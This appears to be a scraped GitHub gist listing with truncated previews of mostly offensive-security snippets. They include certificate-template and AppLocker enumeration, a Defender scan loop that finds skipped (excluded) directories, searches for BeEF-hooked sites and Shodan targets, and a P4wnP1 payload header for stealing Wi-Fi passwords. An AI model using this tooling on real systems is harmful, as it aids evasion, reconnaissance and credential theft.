I hereby claim:
- I am tmap on github.
- I am tmap (https://keybase.io/tmap) on keybase.
- I have a public key whose fingerprint is 1249 18C7 F4D6 0DFF D0A4 D87E 12E9 5BB0 737B EEC7
To claim this, I am signing this object:
| function Get-CertificateTemplateAccess { | |
| [CmdletBinding()] | |
| param( | |
| [Parameter(Mandatory=$false)] | |
| [string]$TemplateName = "*", | |
| [Parameter(Mandatory=$false)] | |
| [string]$IdentityReference = "*", | |
| [Parameter(Mandatory=$false)] |
| Import-Module AppLocker | |
| [xml]$data = Get-AppLockerPolicy -Effective -Xml | |
| # Initialize an array to store rule details | |
| $rules = @() |
| $folderPath = "C:\gg" | |
| if (-Not (Test-Path -Path $folderPath)) { | |
| New-Item -ItemType Directory -Path $folderPath | |
| } | |
| $topExtensions = @( | |
| ".txt", ".log", ".json", ".xml", ".csv", ".html", ".htm", ".php", ".js", ".css", | |
| ".py", ".java", ".c", ".cpp", ".cs", ".rb", ".swift", ".go", ".sh", ".bat", | |
| ".exe", ".dll", ".bin", ".iso", ".img", ".zip", ".rar", ".7z", ".tar", ".gz", |
| $mpCmdRunPath = "C:\Program Files\Windows Defender\MpCmdRun.exe" | |
| $directories = Get-ChildItem -Path C:\ -Directory -recurse -ErrorAction SilentlyContinue | |
| foreach ($directory in $directories) { | |
| $dirPath = $directory.FullName | |
| try { | |
| $output = & $mpCmdRunPath -Scan -ScanType 3 -File "$dirPath\*" 2>$null | |
| if ($output -match "Scanning .* was skipped") { |
| sudo apt update | |
| sudo apt install tor -y | |
| sudo nano /etc/tor/torrc | |
| add: | |
| VirtualAddrNetworkIPv4 10.192.0.0/10 | |
| AutomapHostsOnResolve 1 | |
| TransPort 9040 | |
| DNSPort 5353 |
| import requests | |
| from contextlib import closing | |
| import csv | |
| import sys | |
| api_key = "publicwww_apikey" | |
| search_for_hook_js="%223000%2Fhook.js%22" | |
| try: | |
| req="https://publicwww.com/websites/"+search_for_hook_js+"/?export=csvsnippets&key="+api_key |
| import shodan | |
| import sys | |
| import requests | |
| API_KEY = "apitoken" | |
| try: | |
| api = shodan.Shodan(API_KEY) | |
| result = api.search('port:3000 product:"Apache httpd" centOS') |
| #P4wnP1 | |
| # ========================== | |
| # | |
| # Steals wifi passwords from unlocked computers | |
| # freely inspired by https://github.com/mame82/P4wnP1/tree/master/payloads/hakin9_tutorial | |
| UMSLABEL="WIFI" | |
| fatlabel $wdir/USB_STORAGE/image.bin $UMSLABEL | |
| # ============================= |
| from kitchen import seasonings | |
| import sausage_making | |
| def do_things(): | |
| # grind function takes 2 args, meat type and % of the total | |
| sausage_making.grind(pork_butt,70) | |
| sausage_making.grind(chuck_steak,15) | |
| sausage_making.grind(pork_fatback,15) | |
| # add spices func takes 2 args, type and % of the total |
I hereby claim:
To claim this, I am signing this object: